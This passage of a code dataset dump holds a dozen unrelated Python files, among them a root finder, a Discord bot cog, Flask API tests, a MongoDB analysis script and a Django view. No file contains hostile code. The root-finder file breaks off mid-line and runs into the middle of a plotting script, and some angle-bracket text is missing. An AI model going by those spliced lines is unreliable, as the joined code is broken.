easy(cond):\n\n arr = [0, 10, 29, 138, 337, 1436, 3435, 14434, 34433, 144432, 344431, 1444430, 3444429, 14444428, 34444427, 144444426, 344444425]\n\n def rdc(ch, l, t):\n count1 = 0\n count2 = 0\n swap = 0\n sc1 = ch[0:t]\n sc2 = ch[t:]\n if sc1 != \"1\" + \"0\"*(t-1):\n swap = 1\n count1 = int(sc1[::-1], 10) - 1\n if sc2 != \"0\"*(l-t-1) + \"1\":\n count2 = int(sc2, 10) - 1\n return count1 + count2 + swap + 1\n\n\n def red(chis):\n ich = int(chis)\n l = len(chis)\n if l == 1:\n return ich\n if ich == 10**(l-1):\n return arr[l-1]\n c = 0\n if chis[l-1] == \"0\":\n ich = ich - 1\n c += 1\n chis = str(ich)\n l = len(chis)\n if l % 2 == 0:\n return arr[l-1] + rdc(chis, l, l/2) + c\n else:\n res1 = arr[l-1] + rdc(chis, l, l/2) + c\n res2 = arr[l-1] + rdc(chis, l, l/2 + 1) + c\n return min(res1, res2)\n return red(cond)\n\n\nwith open('./A-small-attempt1.in', 'r') as cf:\n T =int(cf.readline().strip())\n for x in xrange(T):\n with open('./easy.resp', 'a') as cr:\n cr.write(\"Case #%s: %s\\n\"%((x+1), easy(cf.readline().strip())))\n\n\n","sub_path":"solutions_5688567749672960_0/Python/dolphinQ/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"580329673","text":"# standard libraries\nimport logging, os, time\nfrom enum import auto, Enum\nfrom importlib import import_module\nfrom typing import Dict, Sequence, Union\n\n# local libraries\nfrom db.db_creator import DBCreator\nfrom environ import ENV\n\n# third-party libraries\nimport pandas as pd\n\n\n# Initialize settings and global variables\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(\n level=ENV.get('LOG_LEVEL', 'DEBUG'),\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n)\n\n\n# Enum(s)\n\n# Each job name should be defined in ValidJobName.\n# NAME_OF_JOB = 'path.to.method'\n\nclass ValidJobName(Enum):\n COURSE_INVENTORY = 'course_inventory.inventory.run_course_inventory'\n # ONLINE_MEETINGS = 'online_meetings.report...'\n # ZOOM = 'online_meetings.canvas_zoom_meetings...'\n # MIVIDEO = 'mivideo...'\n\n\n# Each data source name should be defined in ValidDataSourceName.\n# NAME_OF_DATA_SOURCE = auto()\n\nclass ValidDataSourceName(Enum):\n CANVAS_API = auto()\n UNIZIN_DATA_WAREHOUSE = auto()\n\n\n# Class(es)\n\nclass Job:\n\n def __init__(self, job_name: ValidJobName) -> None:\n self.name: str = job_name.name\n self.import_path: str = '.'.join(job_name.value.split('.')[:-1])\n self.method_name: str = job_name.value.split('.')[-1]\n self.started_at: Union[int, None] = None\n self.finished_at: Union[int, None] = None\n self.data_sources: Sequence[Dict[str, Union[str, pd.Timestamp]]] = []\n\n def create_metadata(self) -> None:\n started_at_dt = pd.to_datetime(self.started_at, unit='s')\n finished_at_dt = pd.to_datetime(self.finished_at, unit='s')\n\n job_run_df = pd.DataFrame({\n 'job_name': [self.name],\n 'started_at': [started_at_dt],\n 'finished_at': [finished_at_dt]\n })\n job_run_df.to_sql('job_run', db_creator_obj.engine, if_exists='append', index=False)\n logger.info(f'Inserted job_run record with finished_at value of {finished_at_dt}')\n job_run_id = pd.read_sql('job_run', db_creator_obj.engine).iloc[-1]['id']\n\n if len(self.data_sources) == 0:\n logger.warning('No valid data sources were identified')\n else:\n data_source_status_df = pd.DataFrame(self.data_sources)\n data_source_status_df = data_source_status_df.assign(**{'job_run_id': job_run_id})\n data_source_status_df.to_sql('data_source_status', db_creator_obj.engine, if_exists='append', index=False)\n logger.info(f'Inserted {len(data_source_status_df)} data_source_status records')\n\n def run(self) -> None:\n leaf_module = import_module(self.import_path)\n start_method = getattr(leaf_module, self.method_name)\n\n # Until we have a decorator for this\n self.started_at = time.time()\n data_sources = start_method()\n self.finished_at = time.time()\n\n delta = self.finished_at - self.started_at\n str_time = time.strftime('%H:%M:%S', time.gmtime(delta))\n logger.info(f'Duration of job run: {str_time}')\n\n valid_data_sources = []\n for data_source in data_sources:\n data_source_name = data_source['data_source_name']\n if data_source_name in ValidDataSourceName.__members__:\n valid_data_sources.append(data_source)\n else:\n logger.error(f'{data_source_name} is not a valid data source name')\n logger.error(f'No data_source_status record will be inserted.')\n\n self.data_sources = valid_data_sources\n self.create_metadata()\n\n\nclass JobManager:\n\n def __init__(self, job_names: Sequence[str]) -> None:\n self.jobs: Sequence[Job] = []\n for job_name in job_names:\n if job_name.upper() in ValidJobName.__members__:\n job_name_mem = ValidJobName[job_name.upper()]\n self.jobs.append(Job(job_name_mem))\n else:\n logger.error(f'{job_name} is not a valid job name; it will be ignored')\n\n def run_jobs(self) -> None:\n for job in self.jobs:\n logger.info(f'- - Running job {job.name} - -')\n job.run()\n\n\nif __name__ == '__main__':\n how_started = os.environ.get('HOW_STARTED', None)\n\n if how_started == 'DOCKER_COMPOSE':\n logger.info('Waiting for the MySQL turtle, hehe')\n # Wait for MySQL container to finish setting up\n time.sleep(30.0)\n\n # Apply any new migrations\n db_creator_obj = DBCreator(ENV['INVENTORY_DB'], ENV['APPEND_TABLE_NAMES'])\n db_creator_obj.migrate()\n\n # Run those jobs\n manager = JobManager(ENV['JOB_NAMES'])\n manager.run_jobs()\n","sub_path":"run_jobs.py","file_name":"run_jobs.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"487276426","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 1 06:45:05 2020\n\nIllustrates the false position method for root finding\n\n@author: zettergm\n\"\"\"\n\n\n# Imports\nimport numpy as np\nfrom nonlinear_fns import fun1 as f1\nimport matplotlib.pyplot as plt\n\n\n# Setup for iterations for a closed domain method\nmaxit=100\nminx=0\nmaxx=2*np.pi\ntol=1e-3\nverbose=True\n\n\n# Function we are finding roots of\nx=np.linspace(minx,maxx,50)\ny=f1(x)\n\n\n# Initial interval spec\na0=np.pi/4\nb0=np.pi\na=a0\nb=b0\n\n\n# Interval halving iterations\nit=1\nconverged=False\nwhile(not (converged) and (it<=maxit)):\n c=(a+b)/2.0\n \n c=a-f1(a)/( (f1(b)-f1(a))/(b-a) )\n \n aprev=a\n bprev=b\n if (f1(a)*f1(c)<0.0): # we crossed zero so root is in this interval\n b=c\n left=True\n else:\n a=c\n left=False\n xnew=c\n fval=f1(xnew)\n converged=abs(fval) 1:\n# d[i][j] = 1\n labels = utilise.itemDict2list(dataGen4DietAct.genActTypeDict())\n \n\n# x = np.arange(d.shape[0])\n# plt.figure()\n# plt.stackplot(x,d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7])\n# plt.title('DailyActivityPattern_'+sub)\n# plt.xlabel('days')\n# plt.savefig('visDailyActTypePattStack/DailyActivityPattern_'+sub)\n \n# plt.figure()\n# x = np.arange(d.shape[0])\n# data = np.array([d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7]])\n# bottom = np.cumsum(data, axis=0)\n# colors = ('#ff3333', '#33ff33', '#3333ff', '#33ffff','#ff3333', '#33ff33', '#3333ff', '#33ffff')\n# plt.bar(x, data[0], color=colors[0])\n# for j in xrange(1, data.shape[0]):\n# plt.bar(x, data[1], color=colors[j], bottom=bottom[j-1])\n \n\n# colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\n colors = plt.cm.Paired\n \n df = pd.DataFrame(d,columns=labels)\n ax = df.plot.bar(colormap=colors,stacked = True)\n plt.legend(bbox_to_anchor=(1.05,1), loc=2)\n plt.title('DailyActivityPattern_'+sub)\n plt.xlabel('days')\n plt.ylabel('frequency per day')\n data = dietActInfoRetrv.getDaysList(sub)\n ax.set_xticklabels(data)\n plt.savefig('visDailyActTypePattStack/DailyActivityPattern_'+sub,bbox_inches='tight')\n \n \n for sub in available_list:\n d = dataGen4DietAct.genDailySingleDietTypeTFArray(sub)\n \n# for i in range(d.shape[0]):\n# for j in range(d.shape[1]):\n# if d[i][j] > 1:\n# d[i][j] = 1\n labels = utilise.itemDict2list(dataGen4DietAct.genDietTypeDict())\n\n# x = np.arange(d.shape[0])\n# plt.figure()\n# plt.stackplot(x,d[:,0],d[:,1],d[:,2],d[:,3],d[:,4],d[:,5],d[:,6],d[:,7],d[:,8],d[:,9],d[:,10],d[:,11])\n# plt.title('DailyDietPattern_'+sub)\n# plt.xlabel('days')\n# plt.savefig('visDailyDietTypePattStack/DailyDietPattern_'+sub)\n \n colors = plt.cm.Paired\n \n df = pd.DataFrame(d,columns=labels)\n ax = df.plot.bar(colormap=colors,stacked = True)\n plt.legend(bbox_to_anchor=(1.05,1), loc=2) \n# df.plot.area()\n plt.title('DailyDietPattern_'+sub)\n plt.ylabel('frequency per day')\n plt.xlabel('days')\n data = dietActInfoRetrv.getDaysList(sub)\n ax.set_xticklabels(data)\n plt.savefig('visDailyDietTypePattStack/DailyDietPattern_'+sub,bbox_inches='tight')\n \nvisDailyPatternStack()\n","sub_path":"visDailyPattStack.py","file_name":"visDailyPattStack.py","file_ext":"py","file_size_in_byte":3351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"464967193","text":"from discord.ext import commands\nimport discord\nimport tools\n\nclass Settings(commands.Cog):\n \"\"\"Commands for setting up the bot\"\"\"\n def __init__(self, bot):\n self.bot = bot\n self.database = bot.database\n\n @commands.command(name='prefix', aliases=[\"setprefix\"], usage=\"prefix \")\n @tools.has_perm(manage_guild=True)\n async def prefix(self, ctx, *, new_prefix: str = None):\n db = self.database.bot\n posts = db.serversettings\n prefix_org = \"\"\n\n async for x in posts.find({\"guild_id\": ctx.guild.id}):\n prefix_org = x[\"prefix\"]\n\n if new_prefix is None: # If command didn't specify a new prefix\n return await ctx.send(f\"The prefix is `{prefix_org}`\")\n\n await posts.update_one({\"guild_id\": ctx.guild.id}, {\"$set\": {\"prefix\": new_prefix}})\n await ctx.send(f\"New prefix is `{new_prefix}` from `{prefix_org}`\")\n\n @commands.command(name='logchannel', aliases=[\"setlogchannel\", \"logschannel\"], usage=\"logchannel #channel\")\n @tools.has_perm(manage_guild=True)\n async def logchannel(self, ctx, *, channel: discord.TextChannel = None):\n if channel is None:\n channel = ctx.channel\n\n db = self.database.bot\n posts = db.serversettings\n channel_org = 0\n\n async for x in posts.find({\"guild_id\": ctx.guild.id}):\n channel_org = x[\"log_channel\"]\n\n await posts.update_one({\"guild_id\": ctx.guild.id}, {\"$set\": {\"log_channel\": channel.id}})\n if channel_org != 0:\n await ctx.send(f\"New log channel is <#{channel.id}> from <#{channel_org}>\")\n else:\n await ctx.send(f\"New log channel is <#{channel.id}>\")\n\n\ndef setup(bot):\n bot.add_cog(Settings(bot))\n","sub_path":"cogs/serversettings.py","file_name":"serversettings.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"230780748","text":"from pymongo import MongoClient\nimport datetime\nimport pprint\nimport json\nimport matplotlib.pyplot as plt\nfrom scipy import signal\n# from scipy import fftpack\n# while 1:\n\n\ndef remove_noise(data):\n\tfor index,value in enumerate(data):\n\t\tif value < -40:\n\t\t\tdata[index] = -70\n\n\treturn data\t\t\t\t\t\n \ndef generate_time_series(freqs, times, power):\n\tnew_power = []\n\tnew_time = []\n\tmax_power = min(power[0])\n\tnew_power.append(max_power)\n\tindex = power[0].index(max_power)\n\tnew_time.append(times[0][index])\n\tprint(index)\n\tprint(len(freqs))\n\tfor i in range(1,len(freqs)-1):\n\t\t# print(len(power[i]), len(times[i]), )\n\t\tnew_power.append(power[i][index])\n\t\tnew_time.append(times[i][index])\n\treturn new_power,new_time\t\n\ndef filter(s1_freq_samples,s1_time_samples,s1_power_samples):\n\tnew_freq = []\n\tnew_power = []\n\tnew_time = []\n\tfor i,f in enumerate(s1_freq_samples):\n\t\tif(len(f) == 5):\n\t\t\tnew_freq.append(f)\n\t\t\tnew_power.append(s1_power_samples[i])\n\t\t\tnew_time.append(s1_time_samples[i])\n\t\telse:\n\t\t\tprint(\"ANOMALY FOUND\")\n\t\t\tprint(len(f))\n\t\t\tprint(f)\n\t\t\tprint(\"+++++++++++++++++++++++++++++++++++++++++++++++++++++++++\")\n\treturn(new_freq,new_time,new_power)\t\t\n\n\n\n\nclient = MongoClient('mongodb://130.245.144.129:27017/')\n# print (client.database_names())\ndb = client['kaa']\n# print (db.collection_names())\ncollection = db['logs_94543827559106667076']\n# print (db)\n# print (collection)\ncursor = collection.find({})\ndata = []\n# f= open(\"data.txt\",\"w+\")\nfor document in cursor:\n\tdata.append(document)\n\nprint (data[0]['event']['nodenumber'])\nsensor1_time = []\nsensor1_power = []\nsensor1_freq = []\nfor element in data:\n\t# if(element['event']['nodenumber'] == '9c:b6:d0:e9:73:4d'):\n\tsensor1_time.append(element['event']['timestamp'])\n\tsensor1_power.append(element['event']['power'])\n\tsensor1_freq.append(element['event']['frequency'])\n\n\t\t\n\n\n\n\npoints_1 = zip(sensor1_time,sensor1_freq,sensor1_power)\n\n\nsorted_points_1 = sorted(points_1)\n\n\nnew_sensor1_freq = [point[1] for point in sorted_points_1]\n\n\nnew_sensor1_time = [point[0] for point in sorted_points_1]\n\n\n\nnew_sensor1_power = [point[2] for point in sorted_points_1]\n\n\nstrart_value = new_sensor1_freq[0]\nstart_index = 0\ncount = 0\ns1_freq_samples = []\ns1_power_samples = []\ns1_time_samples = []\nfor index, freq in enumerate(new_sensor1_freq):\n\tif index == 0:\n\t\tcount = count + 1\n\telif count > 0 and freq == strart_value:\n\t\tend_value = new_sensor1_freq[index-1]\n\t\tend_index = index-1\n\t\t# print(start_index,end_index, freq, new_sensor1_freq[index-1], index)\n\t\t# print('****************************************************')\n\t\t# print(len(new_sensor1_freq[start_index:end_index]))\n\t\t# print(new_sensor1_freq[start_index:end_index])\n\n\t\ts1_time_samples.append(new_sensor1_time[start_index:end_index])\n\t\ts1_power_samples.append(new_sensor1_power[start_index:end_index])\n\t\ts1_freq_samples.append(new_sensor1_freq[start_index:end_index])\n\t\tstart_index = index\n\ns1_time_samples.append(new_sensor1_time[start_index:-1])\ns1_power_samples.append(new_sensor1_power[start_index:-1])\ns1_freq_samples.append(new_sensor1_freq[start_index:-1])\n\n\n\n\n\n\n\n\n\ntotal_sweeps = len(s1_freq_samples) \n\n\n\n\ns1_freq_samples,s1_time_samples,s1_power_samples = filter(s1_freq_samples ,s1_time_samples, s1_power_samples)\nnew_power,new_time = generate_time_series(s1_freq_samples,s1_time_samples,s1_power_samples)\n\n \nnum_bins = 20\n# the histogram of the data\nn, bins, patches = plt.hist(new_power, num_bins, normed=1, facecolor='blue', alpha=0.5)\n \n# add a 'best fit' line\n# y = mlab.normpdf(bins, mu, sigma)\n# plt.plot(bins, new_power, 'r--')\nplt.xlabel('Power')\nplt.ylabel('Probability')\n# plt.title(r'Histogram of IQ: $\\mu=100$, $\\sigma=15$')\n \n# Tweak spacing to prevent clipping of ylabel\n# plt.subplots_adjust(left=0.15)\nplt.show()\n\n\n# fig = plt.figure(1)\n# plt.plot(new_time,new_power)\n# plt.show()\n\n","sub_path":"single_sensor.py","file_name":"single_sensor.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"191835821","text":"import wx\nimport os, sys, traceback, subprocess\nfrom include.log_conf import info, error, er\nfrom pprint import pprint as pp\nhome=os.path.dirname(sys.argv[0])\nif not home :\n\thome=os.path.dirname(os.path.abspath(__file__))\n\t\n\nEDITOR = r'C:\\tmp\\Notepad++\\notepad++.exe'\n\n\nimport collections\nPageType = collections.namedtuple('PageType', ['host', 'app'])\nPAGE_TYPE = PageType(0, 1)\n\n\ndef format_stacktrace():\n\tparts = [\"Traceback (most recent call last):\\n\"]\n\tparts.extend(traceback.format_stack(limit=50)[:-2])\n\tparts.extend(traceback.format_exception(*sys.exc_info())[1:])\n\treturn \"\".join(parts)\n\t\n\n\ndef open_editor(fn, ln=0, win=None, cdir=None):\n\ttry:\n\t\tif cdir: os.chdir(cdir)\n\t\tassert os.path.isfile(fn), 'Cannot open file \"%s\" [%s]' % (fn, os.getcwd())\n\n\t\t\n\t\t#info('Editing 1 \"%s\"' % fn)\n\t\tif ln:\n\t\t\tsubprocess.call([EDITOR, fn, '-n%d' % ln])\n\t\telse:\n\t\t\tsubprocess.call([EDITOR, fn])\n\texcept:\n\t\traise\n\t\tif 0:\n\t\t\timport inspect\n\t\t\t#pp (traceback.format_stack(limit=500))\n\t\t\tfrm = inspect.trace()\n\t\t\t#pp(frm)\n\t\t\tmod = inspect.getmodule(frm[0])\n\t\t\tmodname = mod.__name__ if mod else frm[1]\n\t\t\t#print ('Thrown from', modname)\n\t\t\n\t\tif 1:\n\t\t\tprint(format_stacktrace())\n\t\tif 0:\n\t\t\texc_type, exc_value, exc_traceback = sys.exc_info()\n\t\t\tprint (\"*** print_tb:\")\n\t\t\ttraceback.print_tb(exc_traceback, limit=50, file=sys.stdout)\n\t\t\tprint (\"*** print_exception:\")\n\t\t\ttraceback.print_exception(exc_type, exc_value, exc_traceback,\n\t\t\t\t\t\t\t\t\t limit=50, file=sys.stdout)\n\t\tif 0:\n\t\t\texc_type, exc_value, exc_traceback = sys.exc_info()\n\t\t\tprint (\"*** print_exc:\")\n\t\t\ttraceback.print_exc()\n\t\t\tprint (\"*** format_exc, first and last line:\")\n\t\t\tformatted_lines = traceback.format_exc().splitlines()\n\t\t\tprint (formatted_lines[0])\n\t\t\tprint (formatted_lines[-1])\n\t\t\tprint (\"*** format_exception:\")\n\t\t\tprint (repr(traceback.format_exception(exc_type, exc_value,\n\t\t\t\t\t\t\t\t\t\t\t\t exc_traceback)))\n\t\t\tprint (\"*** extract_tb:\")\n\t\t\tprint (repr(traceback.extract_tb(exc_traceback)))\n\t\t\tprint (\"*** format_tb:\")\n\t\t\tprint (repr(traceback.format_tb(exc_traceback)))\n\t\t\tprint (\"*** tb_lineno:\", exc_traceback.tb_lineno)\n\t\n\t\tif 0:\n\t\t\tstacktrace = format_stacktrace()\n\t\t\terror(stacktrace)\n\n\t\t\tif 1:\n\t\t\t\timport dialog.ErrDlg as ED\n\t\t\t\tED.show(stacktrace, win)\n\t\t\tif 0:\n\t\t\t\tdlg = wx.MessageDialog(win, stacktrace,\n\t\t\t\t\t'Cannot open file',\n\t\t\t\t\twx.OK | wx.ICON_INFORMATION\n\t\t\t\t\t#wx.YES_NO | wx.NO_DEFAULT | wx.CANCEL | wx.ICON_INFORMATION\n\t\t\t\t\t)\n\t\t\t\tdlg.ShowModal()\n\t\t\t\tdlg.Destroy()\n\t\t\t\t","sub_path":"include/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"348331776","text":"# coding: utf-8\n\nimport unittest\n\nfrom json import loads as json_loads\n\nfrom attrdict import AttrDict\n\nimport api\n\n\nclass TestBrasilIOAPI(unittest.TestCase):\n def setUp(self):\n api.app.config['TESTING'] = True\n self.app = api.app.test_client()\n\n def json_get(self, url, status_code=False, follow_redirects=True):\n response = self.app.get(url, follow_redirects=follow_redirects)\n content_type = response.headers['Content-Type'].split(';')[0].strip()\n if content_type == 'application/json':\n data = AttrDict(json_loads(response.data))\n else:\n data = AttrDict({'data': response.data})\n if status_code:\n data.status_code = response.status_code\n return data\n\n @unittest.skip('TODO: implementar')\n def test_meta(self):\n response = self.json_get('/')\n self.assertIn('meta', response)\n meta = response.data['meta']\n\n @unittest.skip('TODO: implementar')\n def test_regioes(self):\n response = self.json_get('/')\n self.assertIn('regioes', response)\n regioes = response.regioes\n\n def test_listagem_de_unidades_federativas(self):\n response = self.json_get('/')\n self.assertIn('unidades_federativas', response)\n unidades_federativas = response.unidades_federativas\n self.assertEqual(len(unidades_federativas), 27)\n\n chaves_necessarias = {'codigo-ibge', 'url', 'sigla', 'nome'}\n for uf in unidades_federativas:\n self.assertEqual(set(uf.keys()), chaves_necessarias)\n self.assertEqual(uf['url'][-1], '/')\n\n nomes = [uf['nome'] for uf in unidades_federativas]\n self.assertEqual(sorted(nomes), nomes)\n\n self.assertEqual(self.json_get('/rj/'), self.json_get('/rj'))\n self.assertEqual(self.json_get('/rj/'), self.json_get('/RJ/'))\n\n def test_unidade_federativa_nao_existe(self):\n erro_esperado = u'Unidade Federativa não encontrada.'\n nao_existe = self.json_get('/na', status_code=True)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, erro_esperado)\n nao_existe = self.json_get('/ab/non-ecziste', status_code=True)\n self.assertEqual(nao_existe.erro, erro_esperado)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, erro_esperado)\n\n def test_listagem_de_municipios_possui_chaves_necessarias(self):\n chaves_necessarias = {'codigo-ibge', 'url', 'sigla', 'nome',\n 'municipios'}\n unidades_federativas = self.json_get('/').unidades_federativas\n for uf in unidades_federativas:\n municipios_uf = self.json_get(uf['url'])\n self.assertEqual(set(municipios_uf.keys()), chaves_necessarias)\n\n def test_municipios_possuem_chaves_necessarias(self):\n rj = self.json_get('/rj')\n self.assertEqual(len(rj.municipios), 92)\n\n chaves_necessarias = {'codigo-ibge', 'url', 'nome'}\n for municipio in rj.municipios:\n self.assertEqual(set(municipio.keys()), chaves_necessarias)\n\n def test_municipios_aparecem_em_ordem_alfabetica(self):\n unidades_federativas = self.json_get('/').unidades_federativas\n for uf in unidades_federativas:\n municipios = self.json_get(uf['url']).municipios\n nomes = []\n for municipio in municipios:\n nomes.append(municipio['nome'])\n self.assertEqual(municipio['url'][-1], '/')\n self.assertEqual(nomes, sorted(nomes))\n\n def test_municipio_nao_existe(self):\n nao_existe = self.json_get('/rj/non-ecziste', status_code=True)\n self.assertEqual(nao_existe.status_code, 404)\n self.assertEqual(nao_existe.erro, u'Município não encontrado.')\n\n def test_municipio_deve_retornar_chaves_necessarias(self):\n tres_rios = self.json_get('/rj/tres-rios', status_code=True,\n follow_redirects=False)\n self.assertEqual(tres_rios.status_code, 301)\n self.assertEqual(self.json_get('/rj/tres-rios'),\n self.json_get('/rj/tres-rios/'))\n\n tres_rios = self.json_get('/rj/tres-rios/')\n chaves_necessarias = {'codigo-ibge', 'url', 'nome'} # TODO: ?\n self.assertEqual(set(tres_rios.keys()), chaves_necessarias)\n\n def test_deve_aceitar_requisicoes_jsonp(self):\n content_type = 'Content-Type'\n json_type = 'application/json'\n jsonp_type = 'application/javascript'\n urls = ['/', '/rj/', '/rj/tres-rios/']\n\n for url in urls:\n normal = self.app.get(url)\n jsonp = self.app.get(url + '?callback=myCallback')\n self.assertEqual('myCallback({});'.format(normal.data), jsonp.data)\n self.assertEqual(normal.headers[content_type], json_type)\n self.assertEqual(jsonp.headers[content_type], jsonp_type)\n\n def test_deve_aceitar_requisicoes_cors_simples(self):\n content_type = 'Content-Type'\n expected_type = 'application/json'\n urls = ['/', '/rj/', '/rj/tres-rios/']\n\n for url in urls:\n normal = self.app.get(url)\n self.assertNotIn('Access-Control-Allow-Origin', normal.headers)\n self.assertEqual(normal.headers[content_type], expected_type)\n\n cors = self.app.get(url, headers={'Origin': 'http://example.com'})\n self.assertIn('Access-Control-Allow-Origin', cors.headers)\n self.assertEqual(cors.headers['Access-Control-Allow-Origin'], '*')\n self.assertEqual(cors.headers[content_type], expected_type)\n","sub_path":"test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":5606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"10313888","text":"'''\nCreated on Oct 19, 2019\n\n@author: jsaavedr\n'''\n\nimport skimage.feature as feat\nimport skimage.transform as trans\nimport pai\nimport sys\nimport numpy as np\n\nclass HOG :\n def __init__(self, image_size= (128,128), orientations = 8, grid_size = (4,4)):\n self.image_size = image_size\n self.orientations = orientations #number of orientations\n self.grid_size = grid_size # numberl of blocks\n \n def get_lenght(self):\n return self.orientations * self.grid_size[0] * self.grid_size[1]\n\n def get_hog(self, image):\n image = trans.resize(image, self.image_size)\n image = pai.to_uint8(image) \n fd = feat.hog(image, orientations= self.orientations,\n pixels_per_cell=(self.image_size[0]/self.grid_size[0], \n self.image_size[1]/self.grid_size[1]), \n cells_per_block=(1, 1), feature_vector = True)\n #normalizing the feature vector\n fd = np.sqrt(fd)\n norm = np.sqrt(np.dot(fd, fd));\n fd = fd / norm \n return fd\n\n#\nif __name__ == '__main__' : \n filename = sys.argv[1]\n image = pai.imread(filename, as_gray = True)\n hog = HOG() \n h = hog.get_hog(image)\n\n norm = np.sqrt(np.dot(h, h));","sub_path":"hog_features.py","file_name":"hog_features.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"349367116","text":"import json\nimport yaml\nimport os.path\n\nfrom collections import defaultdict\nfrom google.appengine.ext import webapp\nfrom google.appengine.api import urlfetch\n\nfrom app.tasks.getversions import testHandler\nfrom app.helpers import template\nfrom app.helpers import ghAuth\n\n\n\"\"\" API URL to pull requests for the project registry\n\"\"\"\ndef pullRequestApiUrl():\n return ghAuth('https://api.github.com/repos/version-is/version.is-sources/pulls')\n\n\n\"\"\" parse yaml file\n\"\"\"\ndef parseYamlFile(url):\n response = []\n # Get yaml file\n rawfile = urlfetch.fetch(url).content\n rawfile = yaml.load(rawfile)\n # Validate each yaml object\n for project in rawfile:\n data = defaultdict()\n\n try:\n\n data['project'] = project\n data['name'] = rawfile[project]['name']\n data['website'] = rawfile[project]['website']\n data['handler'] = rawfile[project]['handler']\n data['handler_valid'] = testHandler(data['handler']['type'])[0]\n\n response.append(data)\n\n except KeyError:\n raise Exception('Invalid file: ' + url)\n\n return response\n\n\n\"\"\" Parse the pull request contents\n\"\"\"\ndef parsePullRequest(url):\n response = []\n # Get the list of files added in the pull request\n pullfiles = urlfetch.fetch(ghAuth(url + '/files'))\n pullfiles = json.loads(pullfiles.content)\n for pullfile in pullfiles:\n pulldata = defaultdict()\n pulldata['filename'] = pullfile['filename']\n pulldata['status'] = pullfile['status']\n pulldata['patch'] = pullfile['patch']\n pulldata['raw_url'] = pullfile['raw_url']\n pulldata['blob_url'] = pullfile['blob_url']\n pulldata['extension'] = os.path.splitext(pullfile['filename'])[1][1:]\n if pulldata['extension'] == 'yaml':\n pulldata['valid'] = True\n pulldata['data'] = parseYamlFile(pullfile['raw_url'])\n else:\n pulldata['valid'] = False\n pulldata['data'] = {}\n\n response.append(pulldata)\n\n return response\n\n\n\"\"\" Show a warning, if more than one file is changed\n\"\"\"\ndef testFileCount(filecount):\n return filecount != 1\n\n\n\"\"\" Get data about a pull request\n\"\"\"\ndef getPullRequestData(data):\n # Build a dict with information about the pull request\n pulldata = defaultdict()\n\n # Get the pullreq number\n pulldata['number'] = data['number']\n # Get the link to the pull req\n pulldata['link'] = data['_links']['html']['href']\n # Get data about the files in the pull request\n pulldata['files'] = parsePullRequest(data['url'])\n # Bool: Is there more than one file?\n pulldata['file_count_warning'] = testFileCount(len(pulldata['files']))\n\n return pulldata\n\n\n\"\"\" Get data about the open pull requests\n\"\"\"\ndef getPullRequests():\n # Fetch the json object with all pull requests\n pullreqs = urlfetch.fetch(pullRequestApiUrl()).content\n pullreqs = json.loads(pullreqs)\n\n response = []\n\n # Get data for the open ones\n for pullreq in pullreqs:\n if pullreq['state'] == 'open':\n response.append(getPullRequestData(pullreq))\n\n return response\n\n\n\"\"\" Request handler\n\"\"\"\nclass ValidatePullReq(webapp.RequestHandler):\n def get(self):\n template_data = {\n 'title': 'Pull Requests',\n 'pullreqs': getPullRequests() # Get data\n }\n\n rendered = template.render('validate_pullreq', template_data)\n\n self.response.write(rendered) # Output the rendered data\n\n","sub_path":"app/tasks/validate_pullreq.py","file_name":"validate_pullreq.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"217346646","text":"from django.core.paginator import Paginator\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom Account.models import Account\nfrom User.models import User\n\n\ndef accountlist(request):\n\n # userid = request.session.get('user_id')\n #\n # print(userid)\n #\n # # user = User.objects.get(pk=userid)\n #\n # users = User.objects.filter(id=userid)\n #\n # if users.exists():\n\n idcardno = request.POST.get('idcard_no')\n realname = request.POST.get('real_name')\n loginname = request.POST.get('login_name')\n status = request.POST.get('status')\n\n # 可以直接在option中添加value属性 直接获取对应的value值\n # if status == '开通':\n # status = '0'\n # elif status == '暂停':\n # status = '1'\n # elif status == '删除':\n # status = '2'\n # else:\n # status = None\n\n\n search_dict = request.GET.get('search_dict')\n\n\n if not search_dict:\n search_dict = dict()\n else:\n search_dict = eval(search_dict)\n\n\n if idcardno:\n search_dict['idcard_no']=idcardno\n if realname:\n search_dict['real_name']=realname\n if loginname:\n search_dict['login_name']=loginname\n if status:\n search_dict['status'] = status\n\n # 如果字典中没有数据 那么就是查询的所有\n # 如果有数据 那么查询就是对应的过滤条件\n account_list = Account.objects.filter(**search_dict)\n\n page = int(request.GET.get('page',1))\n\n # account_list = Account.objects.all()\n\n pagin = Paginator(account_list,3)\n\n p = pagin.page(page)\n\n context = {\n 'pagin':pagin,\n 'p':p,\n 'pn':page,\n 'search_dict':search_dict\n }\n\n return 